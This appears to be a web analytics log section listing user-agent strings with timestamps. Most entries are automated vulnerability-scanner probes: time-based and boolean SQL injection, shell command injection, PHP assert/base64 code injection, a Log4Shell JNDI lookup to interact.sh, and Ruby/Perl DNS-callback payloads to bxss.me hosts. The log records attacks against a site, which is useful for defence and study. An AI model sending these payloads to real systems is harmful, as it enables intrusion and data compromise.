-1_OR_2_717-717-1=0_0_0_1 20220520075831
q8Ib4taL'))_OR_761=(SELECT_761_FROM_PG_SLEEP(15))-- 20220520075605
&echo_aheewk$()\\_qydbwn\\nz^xyu||a_#'_&echo_aheewk$()\\_qydbwn\\nz^xyu||a_#|\ 20220520075601
-1'_OR_2_918-918-1=0_0_0_1_or_'84QpdYoO'=' 20220520074559
@@UbM5E 20220520074756
-1'_OR_2_336-336-1=0_0_0_1_-- 20220520075024
&echo_vxpasq$()\\_yxqaid\\nz^xyu||a_#'_&echo_vxpasq$()\\_yxqaid\\nz^xyu||a_#|\ 20220520075207
-1_OR_2_150-150-1=0_0_0_1_-- 20220520073930
yys2WLqN';_waitfor_delay_'0:0:15'_-- 20220520075120
@@xhQgk 20220520074606
3QfolxBB 20220520074625
echo_hhhuhe$()\\_akinbd\\nz^xyu||a_#'_&echo_hhhuhe$()\\_akinbd\\nz^xyu||a_#|\ 20220520081213
-1'_OR_2_459-459-1=0_0_0_1_or_'Jb2HwJeC'=' 20220520073931
echo_lcgwmg$()\\_rxbjyz\\nz^xyu||a_#'_&echo_lcgwmg$()\\_rxbjyz\\nz^xyu||a_#|\ 20220520074825
${9999550_10000041} 20220520075928
ioYn5FEH 20220520074444
${10000346_10000103} 20220520075041
-1'_OR_2_791-791-1=0_0_0_1_or_'wu3dVE8T'=' 20220520075600
|echo_rgstuf$()\\_mcthgv\\nz^xyu||a_#'_|echo_rgstuf$()\\_mcthgv\\nz^xyu||a_#|\ 20220520074017
CR4QuSep 20220520075514
-1'_OR_2_826-826-1=0_0_0_1_-- 20220520074559
-1'_OR_2_126-126-1=0_0_0_1_-- 20220520075421
1FLo28LYO 20220520075912
n1Wo7n5B'_OR_633=(SELECT_633_FROM_PG_SLEEP(15))-- 20220520073805
'_'A'.concat(70-3).concat(22*4).concat(117).concat(80).concat(107).concat(86)_(require'socket'_Socket.gethostbyname('hitln'_'bvoeugvde96b9.bxss.me.')[3].to_s)_' 20220520081456
iUZyeiHx 20220520074920
-1'_OR_2_986-986-1=0_0_0_1_or_'aoH7f3Ii'=' 20220520075116
|echo_ocxonz$()\\_nbibwz\\nz^xyu||a_#'_|echo_ocxonz$()\\_nbibwz\\nz^xyu||a_#|\ 20220520074647
python-requests/2.26.0 20220518140443
1Dndy9haO 20220520075408
@@jRz3R 20220520075012
gLrg9qkM 20220520075559
p9tVsGdS')_OR_151=(SELECT_151_FROM_PG_SLEEP(15))-- 20220520074639
-1_OR_2_558-558-1=0_0_0_1_-- 20220520073803
'_'A'.concat(70-3).concat(22*4).concat(121).concat(73).concat(121).concat(76)_(require'socket'_Socket.gethostbyname('hitzw'_'gbvdlpgr443c8.bxss.me.')[3].to_s)_' 20220520075613
${9999958_9999987} 20220520074922
'_'A'.concat(70-3).concat(22*4).concat(113).concat(70).concat(109).concat(65)_(require'socket'_Socket.gethostbyname('hitad'_'sncddedk48218.bxss.me.')[3].to_s)_' 20220520074502
t5f2ZXZG 20220520074748
${9999210_9999178} 20220520080751
|echo_hrptqb$()\\_jjgbjz\\nz^xyu||a_#'_|echo_hrptqb$()\\_jjgbjz\\nz^xyu||a_#|\ 20220520081219
Nkpx4V0Q'_OR_254=(SELECT_254_FROM_PG_SLEEP(15))-- 20220520074754
<!-- 20220520081535
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers'_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20220531134744
nNyM6jWR'_OR_408=(SELECT_408_FROM_PG_SLEEP(15))-- 20220520080232
-1_OR_2_691-691-1=0_0_0_1 20220520075115
pPYtmhMS'))_OR_394=(SELECT_394_FROM_PG_SLEEP(15))-- 20220520075010
HdDbeJPo')_OR_584=(SELECT_584_FROM_PG_SLEEP(15))-- 20220520074926
${9999025_9999647} 20220520075113
'.gethostbyname(lc('hitqg'.'kwyebaayd05e6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(84).chr(114).chr(76).' 20220520073818
AnYCtRj2 20220520075831
-1'_OR_2_108-108-1=0_0_0_1_-- 20220520080845
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 20220520081428
${10000185_10000033} 20220520075606
|echo_sfbczd$()\\_gxcltc\\nz^xyu||a_#'_|echo_sfbczd$()\\_gxcltc\\nz^xyu||a_#|\ 20220520073900
${jndi:ldap://127.0.0.1#.${hostName}.useragent.caahq86ajk7oosbj3b10ckk1miebt6ngg.interact.sh} 20220530161517
'_'A'.concat(70-3).concat(22*4).concat(97).concat(65).concat(122).concat(88)_(require'socket'_Socket.gethostbyname('hitmu'_'rahkfedt8e112.bxss.me.')[3].to_s)_' 20220520074008
0\ 20220520081443
-1'_OR_2_237-237-1=0_0_0_1_or_'jk3QG8Dg'=' 20220520073801
-1'_OR_2_447-447-1=0_0_0_1_-- 20220520075003
echo_qlodqg$()\\_dmjfpx\\nz^xyu||a_#'_&echo_qlodqg$()\\_dmjfpx\\nz^xyu||a_#|\ 20220520074735
K97NusTF'))_OR_492=(SELECT_492_FROM_PG_SLEEP(15))-- 20220520074651
HttP://bxss.me/t/xss.html?%00 20220520081425
-1'_OR_2_78-78-1=0_0_0_1_or_'DSZLEmmu'=' 20220520075024
&echo_xzmyag$()\\_pmzlmo\\nz^xyu||a_#'_&echo_xzmyag$()\\_pmzlmo\\nz^xyu||a_#|\ 20220520074827
-1_OR_2_510-510-1=0_0_0_1_-- 20220520075527
'.gethostbyname(lc('hitsq'.'yhbnajtef53c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(68).chr(119).chr(83).' 20220520074907
y5T9U3Qj'_OR_866=(SELECT_866_FROM_PG_SLEEP(15))-- 20220520075922
'.gethostbyname(lc('hitjl'.'tnxvribobe6da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(74).chr(101).chr(69).' 20220520075508
mfXVuvAT'_OR_681=(SELECT_681_FROM_PG_SLEEP(15))-- 20220520074603
l6F8o9wA')_OR_973=(SELECT_973_FROM_PG_SLEEP(15))-- 20220520074457
${9999670_9999200} 20220520074655
HTTP_Banner_Detection_(https://security.ipip.net) 20220530030645
echo_qtoavo$()\\_mfmlqf\\nz^xyu||a_#'_&echo_qtoavo$()\\_mfmlqf\\nz^xyu||a_#|\ 20220520074515
tD78HtO1 20220520075305
1mEnVDncO 20220520075551
GdA0esgs';_waitfor_delay_'0:0:15'_-- 20220520074800
&echo_idkkfs$()\\_adrjbe\\nz^xyu||a_#'_&echo_idkkfs$()\\_adrjbe\\nz^xyu||a_#|\ 20220520075900
&echo_anfite$()\\_tcojid\\nz^xyu||a_#'_&echo_anfite$()\\_tcojid\\nz^xyu||a_#|\ 20220520074433
ph6t7Lls 20220520075001
'\ 20220520081529
Pjb0hQKu'_OR_979=(SELECT_979_FROM_PG_SLEEP(15))-- 20220520075834
if(now()=sysdate(),sleep(15),0) 20220520081428
-1'_OR_2_434-434-1=0_0_0_1_-- 20220520074647
&echo_avlawf$()\\_wvskva\\nz^xyu||a_#'_&echo_avlawf$()\\_wvskva\\nz^xyu||a_#|\ 20220520075112
4tud4rUI 20220520074750
${10000118_10000130} 20220520074624
-1_OR_2_292-292-1=0_0_0_1_-- 20220520075023
${@print(md5(31337))}\\ 20220520081447
&echo_jclpgy$()\\_qibeqv\\nz^xyu||a_#'_&echo_jclpgy$()\\_qibeqv\\nz^xyu||a_#|\ 20220520075035
'.gethostbyname(lc('hittz'.'rujkfdrt6f7c7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(70).chr(104).chr(88).' 20220520074603
KDh3uN8h';_waitfor_delay_'0:0:15'_-- 20220520073933
&echo_pfojsw$()\\_kouipc\\nz^xyu||a_#'_&echo_pfojsw$()\\_kouipc\\nz^xyu||a_#|\ 20220520074515
1gDYTYr8O 20220520074510
ecZYy9r5';_waitfor_delay_'0:0:15'_-- 20220520074650
echo_oowhbh$()\\_yjytpj\\nz^xyu||a_#'_&echo_oowhbh$()\\_yjytpj\\nz^xyu||a_#|\ 20220520075919
'.gethostbyname(lc('hithz'.'btsjaylv63737.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(81).chr(113).chr(70).' 20220520075044
|echo_dmnxbt$()\\_mefnhi\\nz^xyu||a_#'_|echo_dmnxbt$()\\_mefnhi\\nz^xyu||a_#|\ 20220520074433
@@4cGzH 20220520075122
JuNMrRgt')_OR_664=(SELECT_664_FROM_PG_SLEEP(15))-- 20220520074603
) 20220520081303
${9999741_9999726} 20220520074000
-1_OR_2_962-962-1=0_0_0_1_-- 20220520075002
YzRwQKun';_waitfor_delay_'0:0:15'_-- 20220520073820
TSz12mKd 20220520073930
'.gethostbyname(lc('hitpx'.'yqoowjrh372b7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(86).chr(104).chr(89).' 20220520073940
VIiBTY7L'_OR_973=(SELECT_973_FROM_PG_SLEEP(15))-- 20220520075430
1kKtLAztO 20220520074615
1_\xc0\xa7\xc0\xa2%2527%2522 20220520081548
-1'_OR_2_967-967-1=0_0_0_1_-- 20220520074445
JUdbG6oH'))_OR_78=(SELECT_78_FROM_PG_SLEEP(15))-- 20220520075043
-1_OR_2_189-189-1=0_0_0_1 20220520075023
&echo_pyjrek$()\\_jsrsbz\\nz^xyu||a_#'_&echo_pyjrek$()\\_jsrsbz\\nz^xyu||a_#|\ 20220520074747
${9999462_9999642} 20220520075857
@@jPzCU 20220520074502
-1'_OR_2_237-237-1=0_0_0_1_or_'LcZndXML'=' 20220520074628
1nzKXameO 20220520075032
S78LV05B'_OR_45=(SELECT_45_FROM_PG_SLEEP(15))-- 20220520074637
2uhYoWEg 20220520075917
@@XJHkG 20220520075046
6GRUVP0u'_OR_536=(SELECT_536_FROM_PG_SLEEP(15))-- 20220520075531
1QYar8agO 20220520074424
&echo_naehzu$()\\_qoyeju\\nz^xyu||a_#'_&echo_naehzu$()\\_qoyeju\\nz^xyu||a_#|\ 20220520075457
OPQnEPLU'))_OR_975=(SELECT_975_FROM_PG_SLEEP(15))-- 20220520081021
${9999448_10000147} 20220520075430
1gNsGlmLO 20220520075134
-1'_OR_2_782-782-1=0_0_0_1_or_'f2juy2II'=' 20220520075037
'_'A'.concat(70-3).concat(22*4).concat(108).concat(75).concat(117).concat(69)_(require'socket'_Socket.gethostbyname('hitdr'_'fmitijwa91833.bxss.me.')[3].to_s)_' 20220520075056
R5CfXvGm'_OR_427=(SELECT_427_FROM_PG_SLEEP(15))-- 20220520073802
VYusyhR6')_OR_958=(SELECT_958_FROM_PG_SLEEP(15))-- 20220520075922
afj1eeVB')_OR_171=(SELECT_171_FROM_PG_SLEEP(15))-- 20220520075010
-1_OR_2_634-634-1=0_0_0_1 20220520074627
&echo_dyalcg$()\\_vckfav\\nz^xyu||a_#'_&echo_dyalcg$()\\_vckfav\\nz^xyu||a_#|\ 20220520075000
-1_OR_2_109-109-1=0_0_0_1 20220520074445
IR3VnQDP')_OR_114=(SELECT_114_FROM_PG_SLEEP(15))-- 20220520075028
dtfnmzTI'))_OR_291=(SELECT_291_FROM_PG_SLEEP(15))-- 20220520074828
python-requests/2.27.1 20220531191604
'.gethostbyname(lc('hitnj'.'cewblqie84e53.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(82).chr(109).chr(84).' 20220520075903
'.gethostbyname(lc('hitpo'.'hmdjtvnc9133a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(85).chr(113).chr(88).' 20220520074934
!(()&&!|*|*| 20220520081308
1Zznf7vGO 20220520075103
'_'A'.concat(70-3).concat(22*4).concat(121).concat(89).concat(122).concat(84)_(require'socket'_Socket.gethostbyname('hitfp'_'dtmmckjweb4a8.bxss.me.')[3].to_s)_' 20220520074908
-1_OR_2_122-122-1=0_0_0_1 20220520074921
echo_flbuys$()\\_owpajh\\nz^xyu||a_#'_&echo_flbuys$()\\_owpajh\\nz^xyu||a_#|\ 20220520075457
echo_gkmjhy$()\\_tlxvny\\nz^xyu||a_#'_&echo_gkmjhy$()\\_tlxvny\\nz^xyu||a_#|\ 20220520074647
|echo_tbtkmm$()\\_xrswez\\nz^xyu||a_#'_|echo_tbtkmm$()\\_xrswez\\nz^xyu||a_#|\ 20220520075112
'.gethostbyname(lc('hitex'.'qrutpnmvf7218.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(88).chr(98).chr(77).' 20220520075535
|echo_ruzqaf$()\\_vlthtf\\nz^xyu||a_#'_|echo_ruzqaf$()\\_vlthtf\\nz^xyu||a_#|\ 20220520073814
&echo_nmravs$()\\_jrwfmm\\nz^xyu||a_#'_&echo_nmravs$()\\_jrwfmm\\nz^xyu||a_#|\ 20220520074620
&echo_btkfmy$()\\_hygxqk\\nz^xyu||a_#'_&echo_btkfmy$()\\_hygxqk\\nz^xyu||a_#|\ 20220520075416
lUmDZJAB';_waitfor_delay_'0:0:15'_-- 20220520073802
Y1RGZQkk';_waitfor_delay_'0:0:15'_-- 20220520073801
${9999228_9999446} 20220520074831
KqwPAsuL 20220520073817
Dm6D9xWu'))_OR_248=(SELECT_248_FROM_PG_SLEEP(15))-- 20220520073820
HrpQUTUe 20220520074558
KCOzhJxR';_waitfor_delay_'0:0:15'_-- 20220520074602
Mozilla/5.0_zgrab/0.x 20220531012828
http://bxss.me/t/fit.txt%3F.36 20220520081324
&echo_lbfrgc$()\\_wtypgo\\nz^xyu||a_#'_&echo_lbfrgc$()\\_wtypgo\\nz^xyu||a_#|\ 20220520081216
1PfoTGizO 20220520075010
Mozilla/5.0 20220522233836
${@print(md5(31337))} 20220520081442
dIkMnYnZ'_OR_592=(SELECT_592_FROM_PG_SLEEP(15))-- 20220520075120
&echo_qkkqtw$()\\_sxxqwb\\nz^xyu||a_#'_&echo_qkkqtw$()\\_sxxqwb\\nz^xyu||a_#|\ 20220520073928
-1_OR_2_682-682-1=0_0_0_1 20220520073801
PD30HZgL 20220520073801
-1'_OR_2_650-650-1=0_0_0_1_-- 20220520075516
${10000400_9999177} 20220520081227
'_'A'.concat(70-3).concat(22*4).concat(110).concat(86).concat(106).concat(84)_(require'socket'_Socket.gethostbyname('hitxq'_'rvwqwyisecb63.bxss.me.')[3].to_s)_' 20220520073820
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20220531180016
-1_OR_2_886-886-1=0_0_0_1 20220520074823
echo_igmcwu$()\\_epwdkg\\nz^xyu||a_#'_&echo_igmcwu$()\\_epwdkg\\nz^xyu||a_#|\ 20220520074747
echo_fmaqbi$()\\_ovdqsy\\nz^xyu||a_#'_&echo_fmaqbi$()\\_ovdqsy\\nz^xyu||a_#|\ 20220520074921
-1_OR_2_924-924-1=0_0_0_1_-- 20220520073801
${9999105_9999499} 20220520074955
oJTp9uRq'))_OR_685=(SELECT_685_FROM_PG_SLEEP(15))-- 20220520075120
6VIHer1u'))_OR_974=(SELECT_974_FROM_PG_SLEEP(15))-- 20220520074926
1vZmxNA4O 20220520074729
echo_dbtnsr$()\\_ygccwb\\nz^xyu||a_#'_&echo_dbtnsr$()\\_ygccwb\\nz^xyu||a_#|\ 20220520080031
-1'_OR_2_302-302-1=0_0_0_1_-- 20220520074758
'.gethostbyname(lc('hithf'.'ytlsrxtd1303f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(88).chr(111).chr(65).' 20220520074841
TPphAgC6';_waitfor_delay_'0:0:15'_-- 20220520081515
W3MnWM4x'_OR_63=(SELECT_63_FROM_PG_SLEEP(15))-- 20220520073820
-1'_OR_2_799-799-1=0_0_0_1_-- 20220520075320
'_'A'.concat(70-3).concat(22*4).concat(103).concat(70).concat(120).concat(80)_(require'socket'_Socket.gethostbyname('hitdt'_'sjilqyxh61528.bxss.me.')[3].to_s)_' 20220520074607
KDJQqkit'))_OR_293=(SELECT_293_FROM_PG_SLEEP(15))-- 20220520074640
-1_OR_2_262-262-1=0_0_0_1 20220520074750
BGGTfYhl'))_OR_389=(SELECT_389_FROM_PG_SLEEP(15))-- 20220520073802
^(#$!@#$)(()))****** 20220520081315
'Mozilla/5.0_project_patchwatch' 20220526124800
nHBuyUhx';_waitfor_delay_'0:0:15'_-- 20220520073804
|echo_yyrfxg$()\\_thqynw\\nz^xyu||a_#'_|echo_yyrfxg$()\\_thqynw\\nz^xyu||a_#|\ 20220520074621
'_'A'.concat(70-3).concat(22*4).concat(104).concat(90).concat(106).concat(71)_(require'socket'_Socket.gethostbyname('hittw'_'elvqqhww23d49.bxss.me.')[3].to_s)_' 20220520075126
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.36 20220520081310
l9tcpid/v1.1.0 20220531011837
-1_OR_2_461-461-1=0_0_0_1_-- 20220520074647
${9999943_9999709} 20220520073933
NlhqADBl'))_OR_741=(SELECT_741_FROM_PG_SLEEP(15))-- 20220520075408
-1_OR_2_990-990-1=0_0_0_1_-- 20220520075831
-1'_OR_2_690-690-1=0_0_0_1_-- 20220520074751
UNKNVkZo'))_OR_808=(SELECT_808_FROM_PG_SLEEP(15))-- 20220520075834
-1_OR_2_43-43-1=0_0_0_1 20220520074531
Http://bxss.me/t/fit.txt 20220520081320
rXPb59PB')_OR_359=(SELECT_359_FROM_PG_SLEEP(15))-- 20220520075430
-1'_OR_2_286-286-1=0_0_0_1_-- 20220520074823
-1'_OR_2_859-859-1=0_0_0_1_or_'TcMmb0uk'=' 20220520074648
&echo_assqus$()\\_xkarfk\\nz^xyu||a_#'_&echo_assqus$()\\_xkarfk\\nz^xyu||a_#|\ 20220520075014
'.gethostbyname(lc('hitpd'.'zdscubbf406e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(89).chr(99).chr(74).' 20220520074958
'_'A'.concat(70-3).concat(22*4).concat(112).concat(72).concat(111).concat(85)_(require'socket'_Socket.gethostbyname('hitkw'_'cebosoiq78f7b.bxss.me.')[3].to_s)_' 20220520075513
-1_OR_2_466-466-1=0_0_0_1_-- 20220520075514
-1_OR_2_804-804-1=0_0_0_1_-- 20220520074530
xCZWZmLC'))_OR_650=(SELECT_650_FROM_PG_SLEEP(15))-- 20220520075028
python-requests/2.22.0 20220523132759
echo_gnambv$()\\_hltxme\\nz^xyu||a_#'_&echo_gnambv$()\\_hltxme\\nz^xyu||a_#|\ 20220520075527
FxYOj3nh'))_OR_920=(SELECT_920_FROM_PG_SLEEP(15))-- 20220520075923
'.gethostbyname(lc('hitso'.'jsmshpjp7b112.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(81).chr(108).chr(90).' 20220520074022
1BY3nLYAO 20220520073758
1Ios2VXaO 20220520075946
-1_OR_2_360-360-1=0_0_0_1 20220520075515
'_'A'.concat(70-3).concat(22*4).concat(105).concat(67).concat(108).concat(70)_(require'socket'_Socket.gethostbyname('hitil'_'ohxraxmk825f2.bxss.me.')[3].to_s)_' 20220520075324
|echo_lnxxhv$()\\_sbnsld\\nz^xyu||a_#'_|echo_lnxxhv$()\\_sbnsld\\nz^xyu||a_#|\ 20220520074550
@@wjTDn 20220520073821
LOWOnBsg';_waitfor_delay_'0:0:15'_-- 20220520075042
-1'_OR_2_173-173-1=0_0_0_1_-- 20220520073931
|echo_inlxee$()\\_xsivwo\\nz^xyu||a_#'_|echo_inlxee$()\\_xsivwo\\nz^xyu||a_#|\ 20220520074924
-1_OR_2_964-964-1=0_0_0_1 20220520073818
${9999447_10000192} 20220520074551
${9999317_10000339} 20220520074903
-1'_OR_2_518-518-1=0_0_0_1_-- 20220520073801
BWOO7Zqk'_OR_404=(SELECT_404_FROM_PG_SLEEP(15))-- 20220520075401
XomOqMPS'))_OR_819=(SELECT_819_FROM_PG_SLEEP(15))-- 20220520075532
'.gethostbyname(lc('hitzp'.'pacvrjmfc8615.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(87).chr(99).chr(87).' 20220520074453
${10000354_9999173} 20220520073908
mXNrLFC2')_OR_820=(SELECT_820_FROM_PG_SLEEP(15))-- 20220520073801
lEyBrL4a')_OR_463=(SELECT_463_FROM_PG_SLEEP(15))-- 20220520075524
AFE3KYv0'))_OR_954=(SELECT_954_FROM_PG_SLEEP(15))-- 20220520074459
${10000469_9999950} 20220520074519
aOF55g2N')_OR_696=(SELECT_696_FROM_PG_SLEEP(15))-- 20220520074541
echo_ntmhrt$()\\_xrobzg\\nz^xyu||a_#'_&echo_ntmhrt$()\\_xrobzg\\nz^xyu||a_#|\ 20220520073814
'.gethostbyname(lc('hitsb'.'mjghzphea75b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(76).chr(106).chr(89).' 20220520075026
jSJKLT2q 20220520075114
'.gethostbyname(lc('hitgb'.'nrflbvlh5451e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(80).chr(119).chr(75).' 20220520075230
${9999972_9999400} 20220520075528
'_'A'.concat(70-3).concat(22*4).concat(100).concat(89).concat(100).concat(78)_(require'socket'_Socket.gethostbyname('hitxj'_'mgqeuzrf9b490.bxss.me.')[3].to_s)_' 20220520074638
uNOKpYK1';_waitfor_delay_'0:0:15'_-- 20220520075602
Am6ZJNub';_waitfor_delay_'0:0:15'_-- 20220520075833
-1_OR_2_740-740-1=0_0_0_1 20220520073801
-1\ 20220520081420
1hPPrNxx';_waitfor_delay_'0:0:15'_-- 20220520075009
O3Uci4Dn';_waitfor_delay_'0:0:15'_-- 20220520074925
R52O9e0b'_OR_798=(SELECT_798_FROM_PG_SLEEP(15))-- 20220520075523
'_'A'.concat(70-3).concat(22*4).concat(116).concat(79).concat(115).concat(67)_(require'socket'_Socket.gethostbyname('hittt'_'xkogtudi9c542.bxss.me.')[3].to_s)_' 20220520075442
MCig8zc4'_OR_162=(SELECT_162_FROM_PG_SLEEP(15))-- 20220520074456
${10000427_9999969} 20220520074751
XyaJ1VAA'_OR_646=(SELECT_646_FROM_PG_SLEEP(15))-- 20220520081522
-1_OR_2_119-119-1=0_0_0_1_-- 20220520074559
-1'_OR_2_304-304-1=0_0_0_1_-- 20220520081412
1psDzGaYO 20220520073925
-1'_OR_2_173-173-1=0_0_0_1_or_'bBvs8tKi'=' 20220520075004
-1_OR_2_509-509-1=0_0_0_1_-- 20220520075311
PXttEdnZ'))_OR_600=(SELECT_600_FROM_PG_SLEEP(15))-- 20220520075524
echo_qfczue$()\\_jhzutd\\nz^xyu||a_#'_&echo_qfczue$()\\_jhzutd\\nz^xyu||a_#|\ 20220520075600
FR9J4PVL')_OR_959=(SELECT_959_FROM_PG_SLEEP(15))-- 20220520074827
'_'A'.concat(70-3).concat(22*4).concat(111).concat(77).concat(118).concat(73)_(require'socket'_Socket.gethostbyname('hitat'_'frqayuvm642f0.bxss.me.')[3].to_s)_' 20220520074029
-1'_OR_2_366-366-1=0_0_0_1_or_'S2JqcqrU'=' 20220520073801
-1_OR_2_859-859-1=0_0_0_1_-- 20220520075421
${10000436_9999880} 20220520075457
echo_kfacas$()\\_uihohw\\nz^xyu||a_#'_&echo_kfacas$()\\_uihohw\\nz^xyu||a_#|\ 20220520075035
NZvwMvID 20220520081357
-1'_OR_2_401-401-1=0_0_0_1_-- 20220520075832
haPJvGJw')_OR_891=(SELECT_891_FROM_PG_SLEEP(15))-- 20220520073805
OTVoqaqJ'))_OR_132=(SELECT_132_FROM_PG_SLEEP(15))-- 20220520073805
-1'_OR_2_361-361-1=0_0_0_1_-- 20220520075600
'.gethostbyname(lc('hitbh'.'aomxcrbr6f19c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(82).chr(113).chr(81).' 20220520075609
|echo_lzoxex$()\\_dvktlz\\nz^xyu||a_#'_|echo_lzoxex$()\\_dvktlz\\nz^xyu||a_#|\ 20220520075457
echo_jwpbmj$()\\_qzuctl\\nz^xyu||a_#'_&echo_jwpbmj$()\\_qzuctl\\nz^xyu||a_#|\ 20220520075014
GxXcImWJ')_OR_422=(SELECT_422_FROM_PG_SLEEP(15))-- 20220520075405
&echo_kbqctn$()\\_hmkecz\\nz^xyu||a_#'_&echo_kbqctn$()\\_hmkecz\\nz^xyu||a_#|\ 20220520074550
END_UNKNOWNREFERER
# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 512
-1_OR_2_691-691-1=0_0_0_1 20220520075115
pPYtmhMS'))_OR_394=(SELECT_394_FROM_PG_SLEEP(15))-- 20220520075010
nNyM6jWR'_OR_408=(SELECT_408_FROM_PG_SLEEP(15))-- 20220520080232
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers'_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20220531134744
<!-- 20220520081535
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 20220520081428
-1'_OR_2_108-108-1=0_0_0_1_-- 20220520080845
AnYCtRj2 20220520075831
'.gethostbyname(lc('hitqg'.'kwyebaayd05e6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(84).chr(114).chr(76).' 20220520073818
HdDbeJPo')_OR_584=(SELECT_584_FROM_PG_SLEEP(15))-- 20220520074926
${9999025_9999647} 20220520075113
${9999210_9999178} 20220520080751
t5f2ZXZG 20220520074748
'_'A'.concat(70-3).concat(22*4).concat(113).concat(70).concat(109).concat(65)_(require'socket'_Socket.gethostbyname('hitad'_'sncddedk48218.bxss.me.')[3].to_s)_' 20220520074502
Nkpx4V0Q'_OR_254=(SELECT_254_FROM_PG_SLEEP(15))-- 20220520074754
|echo_hrptqb$()\\_jjgbjz\\nz^xyu||a_#'_|echo_hrptqb$()\\_jjgbjz\\nz^xyu||a_#|\ 20220520081219
'.gethostbyname(lc('hitsq'.'yhbnajtef53c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(68).chr(119).chr(83).' 20220520074907
-1_OR_2_510-510-1=0_0_0_1_-- 20220520075527
K97NusTF'))_OR_492=(SELECT_492_FROM_PG_SLEEP(15))-- 20220520074651
-1'_OR_2_78-78-1=0_0_0_1_or_'DSZLEmmu'=' 20220520075024
&echo_xzmyag$()\\_pmzlmo\\nz^xyu||a_#'_&echo_xzmyag$()\\_pmzlmo\\nz^xyu||a_#|\ 20220520074827
HttP://bxss.me/t/xss.html?%00 20220520081425
l6F8o9wA')_OR_973=(SELECT_973_FROM_PG_SLEEP(15))-- 20220520074457
${9999670_9999200} 20220520074655
mfXVuvAT'_OR_681=(SELECT_681_FROM_PG_SLEEP(15))-- 20220520074603
'.gethostbyname(lc('hitjl'.'tnxvribobe6da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(74).chr(101).chr(69).' 20220520075508
y5T9U3Qj'_OR_866=(SELECT_866_FROM_PG_SLEEP(15))-- 20220520075922
0\ 20220520081443
${jndi:ldap://127.0.0.1#.${hostName}.useragent.caahq86ajk7oosbj3b10ckk1miebt6ngg.interact.sh} 20220530161517
'_'A'.concat(70-3).concat(22*4).concat(97).concat(65).concat(122).concat(88)_(require'socket'_Socket.gethostbyname('hitmu'_'rahkfedt8e112.bxss.me.')[3].to_s)_' 20220520074008
|echo_sfbczd$()\\_gxcltc\\nz^xyu||a_#'_|echo_sfbczd$()\\_gxcltc\\nz^xyu||a_#|\ 20220520073900
${10000185_10000033} 20220520075606
echo_qlodqg$()\\_dmjfpx\\nz^xyu||a_#'_&echo_qlodqg$()\\_dmjfpx\\nz^xyu||a_#|\ 20220520074735
-1'_OR_2_447-447-1=0_0_0_1_-- 20220520075003
-1'_OR_2_237-237-1=0_0_0_1_or_'jk3QG8Dg'=' 20220520073801
&echo_avlawf$()\\_wvskva\\nz^xyu||a_#'_&echo_avlawf$()\\_wvskva\\nz^xyu||a_#|\ 20220520075112
-1'_OR_2_434-434-1=0_0_0_1_-- 20220520074647
if(now()=sysdate(),sleep(15),0) 20220520081428
Pjb0hQKu'_OR_979=(SELECT_979_FROM_PG_SLEEP(15))-- 20220520075834
'\ 20220520081529
&echo_idkkfs$()\\_adrjbe\\nz^xyu||a_#'_&echo_idkkfs$()\\_adrjbe\\nz^xyu||a_#|\ 20220520075900
&echo_anfite$()\\_tcojid\\nz^xyu||a_#'_&echo_anfite$()\\_tcojid\\nz^xyu||a_#|\ 20220520074433
GdA0esgs';_waitfor_delay_'0:0:15'_-- 20220520074800
ph6t7Lls 20220520075001
${10000118_10000130} 20220520074624
4tud4rUI 20220520074750
echo_qtoavo$()\\_mfmlqf\\nz^xyu||a_#'_&echo_qtoavo$()\\_mfmlqf\\nz^xyu||a_#|\ 20220520074515
HTTP_Banner_Detection_(https://security.ipip.net) 20220530030645
1mEnVDncO 20220520075551
tD78HtO1 20220520075305
${9999741_9999726} 20220520074000
) 20220520081303
JuNMrRgt')_OR_664=(SELECT_664_FROM_PG_SLEEP(15))-- 20220520074603
@@4cGzH 20220520075122
|echo_dmnxbt$()\\_mefnhi\\nz^xyu||a_#'_|echo_dmnxbt$()\\_mefnhi\\nz^xyu||a_#|\ 20220520074433
'.gethostbyname(lc('hitpx'.'yqoowjrh372b7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(86).chr(104).chr(89).' 20220520073940
1kKtLAztO 20220520074615
VIiBTY7L'_OR_973=(SELECT_973_FROM_PG_SLEEP(15))-- 20220520075430
TSz12mKd 20220520073930
YzRwQKun';_waitfor_delay_'0:0:15'_-- 20220520073820
-1_OR_2_962-962-1=0_0_0_1_-- 20220520075002
&echo_pfojsw$()\\_kouipc\\nz^xyu||a_#'_&echo_pfojsw$()\\_kouipc\\nz^xyu||a_#|\ 20220520074515
1gDYTYr8O 20220520074510
